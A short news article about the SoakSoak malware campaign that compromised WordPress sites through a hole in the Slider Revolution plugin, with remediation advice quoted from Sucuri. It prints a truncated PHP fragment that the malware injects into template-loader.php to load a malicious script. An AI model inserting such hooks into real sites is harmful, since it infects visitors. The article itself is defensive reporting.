SoakSoak Malware Compromises +100,000 WordPress Sites

Since Sunday, December 14th, over 100,000 WordPress sites have fallen victim to Russian malware “SoakSoak”. The malware takes advantage of a vulnerability in popular slideshow plugin Slider Revolution (also known as RevSlider) and targets users by redirecting them to SoakSoak . ru and/or downloading malicious files to users’ computers without their knowledge.

Google has already blacklisted over 10,000 infected domains. However, researchers at Sucuri warn that the extent of the damage is far greater, and many site admins may not even know their sites have been affected since RevSlider is often bundled with many WordPress themes. Furthermore, the vulnerability was disclosed back in September, yet many webmasters either had not heard of the vulnerability or didn’t take it seriously until it was too late.

How SoakSoak Works

VirusThe SoakSoak malware modifies the wp-includes/template-loader.php file to include the following code:

function FuncQueueObject()
add_action("wp_enqueue_scripts", 'FuncQueueObject');

This code causes swfobject.js, located in wp-includes/js/ to be loaded on every page of the site, which then loads malware from the SoakSoak . ru domain.

Detecting SoakSoak

Gaming site Dulfy was one of the first WordPress sites to not only detect SoakSoak, but also to remove the malicious code and go behind a firewall. At this time, there is no clear fix other than using a website firewall and updating Slider Revolution to the latest version, and even that is a temporary solution. “The firewall will be a temporary measure until we can figure out what is doing it,” said Dulfy’s owner Kristina Hunter. Simply editing swfobject.js and template-loader.php doesn’t work since it doesn’t fix the vulnerability in RevSlider, and many sites are getting reinfected within minutes. In another blog post today, Sucuri states,

We are hearing a lot of recommendations online to just replace the swfobject.js and template-loader.php files to remove the infection.

It does removes [sic] the infection, but does not address the left over backdoors and initial entry points. The website will be reinfected quickly. If you are affected by this, expect to find yourself riddled with backdoors and infections, you have to not only clean, but also stop all malicious attacks. You can stop malicious attacks through the use of a Website Firewall, ours or someone else, just use a Firewall, a real one preferably.

Sucuri’s Website Malware and Security Scanner can be used to detect sites that have been compromised.

Images from Shutterstock.

I've always been interested in the latest stuff in science and technology, and I'm currently a freshman undergraduate electrical engineering student at the University of Texas at Austin.